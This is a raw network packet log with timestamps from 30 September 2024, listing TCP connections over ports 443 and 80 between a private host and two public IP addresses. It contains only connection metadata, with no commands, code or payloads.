                                                                                                                                          Sep 30, 2024 18:58:21.609826088 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.609916925 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.609967947 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.610403061 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.610451937 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.610562086 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.610595942 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.610604048 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.610615015 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.610635042 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.610883951 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.610929012 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.610935926 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.610980988 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.611079931 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611105919 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611124992 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.611129999 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611166000 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.611557007 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611632109 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.611731052 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611784935 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.611906052 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611949921 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.611949921 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.611964941 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.612001896 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623030901 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623073101 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623097897 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623121023 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623157978 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623194933 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623281956 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623289108 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623336077 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623363018 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623408079 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623455048 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623496056 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623735905 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623785973 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623847961 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.623907089 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.623946905 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.624025106 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.643472910 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.643518925 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.643539906 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.643547058 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.643558979 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.643580914 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.643600941 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.643719912 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.643810987 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.643908978 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.643959999 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.704408884 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.704493999 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.704515934 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.704567909 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.704696894 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.704715014 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.704771996 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.704778910 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.704837084 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.704858065 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.705087900 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.705703020 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.705719948 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.705760956 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.705775976 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.705780983 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.705811977 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.705821991 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.705881119 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.705887079 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.706037998 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.720177889 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.720201969 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.720256090 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.720267057 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.720314980 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.720329046 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.721142054 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.721157074 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.721219063 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.721224070 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.735162973 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.735187054 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.735274076 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.735281944 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.735337019 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.793966055 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.793992996 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.794055939 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.794069052 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.794133902 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.794703007 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.794718981 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.794796944 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.794802904 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.795299053 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.795317888 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.795357943 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.795363903 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.795403957 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.795442104 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.795485973 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.795490980 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.796241999 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.796256065 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.796312094 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.796320915 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.796358109 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.808095932 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808116913 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808170080 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.808181047 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808222055 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.808576107 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808589935 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808626890 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.808636904 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808653116 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.808664083 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.808701992 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.809283972 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.809303045 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.809351921 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.809356928 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.809401035 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.809421062 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.825134993 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.825169086 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.825256109 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.825264931 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.825316906 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.886754036 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.886781931 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.886878967 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.886898994 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.886912107 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.886995077 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.887276888 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.887337923 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.887339115 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.887355089 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.887407064 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.887758970 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.887785912 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.887824059 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.887831926 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.887856007 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.888453007 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.888468981 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.888505936 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.888511896 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.888560057 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901062012 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901079893 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901128054 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901138067 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901170969 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901245117 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901288986 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901293993 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901518106 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901535988 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901572943 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901577950 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901607990 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901815891 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.901866913 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.901871920 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.917491913 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.917507887 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.917560101 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.917570114 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.917606115 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.979696989 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.979718924 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.979779959 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.979803085 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.979815006 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.981120110 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.981134892 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.981194973 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.981203079 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.981251001 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.981728077 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.981740952 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.981800079 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.981808901 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.981852055 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.982255936 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.982270002 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.982315063 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.982323885 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.982359886 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.982557058 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.982610941 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.993035078 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.993057013 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.993098974 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.993110895 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.993124008 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.993158102 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.993343115 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.993396044 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.993402004 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.993447065 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.994190931 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.994210958 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.994256973 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.994262934 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:21.994290113 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:21.994309902 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.011241913 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.011327982 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.011338949 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.011425972 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.075733900 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.075761080 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.075836897 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.075855970 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.075881958 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.075994968 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076045036 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.076050997 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076092005 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.076316118 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076366901 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.076458931 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076495886 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076507092 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.076512098 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076544046 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.076559067 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.076796055 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.076848984 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.077142000 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.077199936 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.077204943 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.077220917 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078015089 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078068972 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078079939 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.078088045 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078115940 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.078181982 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078227997 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.078238010 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078283072 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.078339100 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078393936 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.078506947 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078555107 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.078694105 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.078742981 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.086743116 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.089684010 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.089713097 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.089741945 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.089749098 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.089756012 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.089781046 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.089801073 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.090526104 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.090622902 CEST44349742104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.090670109 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.092519045 CEST49742443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:22.662693977 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:22.662739992 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.662801027 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:22.663129091 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:22.663141012 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.132118940 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.132280111 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:23.403304100 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:23.403326035 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.403733969 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.404985905 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:23.451407909 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.554825068 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.554893970 CEST44349744162.159.135.234192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:23.554969072 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:23.555696011 CEST49744443192.168.2.5162.159.135.234
                                                                                                                                          Sep 30, 2024 18:58:23.814862967 CEST4974180192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.381666899 CEST4974580192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.386758089 CEST8049745104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:24.386835098 CEST4974580192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.391103983 CEST4974580192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.392694950 CEST4974680192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.396035910 CEST8049745104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:24.398005009 CEST8049746104.21.92.189192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:24.398169994 CEST4974680192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.398926020 CEST4974680192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:24.403770924 CEST8049746104.21.92.189192.168.2.5
